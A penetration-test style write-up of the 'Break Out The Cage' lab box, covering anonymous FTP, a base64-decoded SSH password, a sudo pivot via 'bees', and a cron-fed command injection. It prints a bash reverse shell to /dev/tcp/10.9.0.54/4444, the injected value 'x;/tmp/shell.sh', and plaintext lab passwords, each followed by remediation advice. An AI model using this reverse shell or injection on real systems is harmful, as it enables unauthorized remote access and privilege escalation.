FTP base64 credential, sudo bees pivot, and cron quotes reverse shell
Foundations Linux engagement: anonymous FTP yielded a base64-encoded personal password for Weston; sudo bees impersonated Cage; a world-writable cron quotes file delivered a reverse shell and root mailbox credentials.
- Case files
- FTP base64 credential, sudo bees pivot, and cron quotes reverse shell
Anonymous FTP leaked Weston’s passphrase; bees sudo granted Cage; cron-fed .quotes executed operator reverse shell; root reused a mailbox password from email backups.
Retrieved dad_tasks, base64-decoded Weston’s passphrase, authenticated over SSH.
Impersonated Cage via bees; poisoned .quotes for reverse shell; recovered root password from email_backup.
Engagement summary
Anonymous FTP leaked Weston’s passphrase; bees sudo granted Cage; cron-fed .quotes executed operator reverse shell; root reused a mailbox password from email backups.
BREAK OUT THE CAGE hosted FTP, SSH, and a novelty agent narrative. Nmap showed the expected surface. Anonymous FTP offered dad_tasks — a base64 blob that decoded to Weston’s SSH password. Locally, sudo -l allowed /usr/bin/bees as Cage without a password. Under Cage we found /opt/.dads_scripts/spread_the_quotes.py reading .files/.quotes on a schedule. Overwriting .quotes with a command-chained reverse shell caught user context, then Super_Duper_Checklist and email_backup disclosed root’s password (cageisnotalegend). Full host compromise from anonymous FTP to root mailbox reuse.
Business impact
Public file shares that hold personal notes become credential stores. Passwordless sudo to utility binaries and writable cron inputs are reliable privilege-escalation paths. Root passwords in mail archives turn local footholds into domain-ready secrets.
Anonymous FTP and Weston SSH
Retrieved dad_tasks, base64-decoded Weston’s passphrase, authenticated over SSH.
OPERATOR · FTP / SSH
savvy@lab:~$ nmap -sC -sV 10.10.10.10
21/tcp open ftp 22/tcp open ssh
savvy@lab:~$ ftp 10.10.10.10
Anonymous login OK — get dad_tasks
savvy@lab:~$ base64 -d dad_tasks
Mydadisghostrideraintthatcoolnocausehesonfirejokes
savvy@lab:~$ ssh weston@10.10.10.10
weston@10.10.10.10's password: ******** savvy@lab:~$
Remediation
Disable anonymous FTP or restrict to sterile drop zones. Never store live passwords in shareable notes, even obfuscated. Prefer SSH keys and rotate any secret that appeared in cleartext archives.
sudo bees, cron quotes implant, root mailbox
Impersonated Cage via bees; poisoned .quotes for reverse shell; recovered root password from email_backup.
OPERATOR · PRIVESC
savvy@lab:~$ sudo -l
(cage) NOPASSWD: /usr/bin/bees
savvy@lab:~$ sudo -u cage /usr/bin/bees
cage shell — /opt/.dads_scripts/spread_the_quotes.py
savvy@lab:~$ printf 'x;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/.quotes
cron fires → reverse shell as cage
savvy@lab:~$ cat email_backup/email_1
root password hint recovered → su root
root@lab:~# id
uid=0(root) gid=0(root)
IMPLANT
shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.0.54/4444 0>&1Remediation
Avoid NOPASSWD sudo on interactive or poorly constrained binaries. Treat cron-fed data files as code — root-owned, mode 644, no user write. Scrub mailboxes and home backups for password reuse; enforce unique root secrets via vaulted break-glass accounts.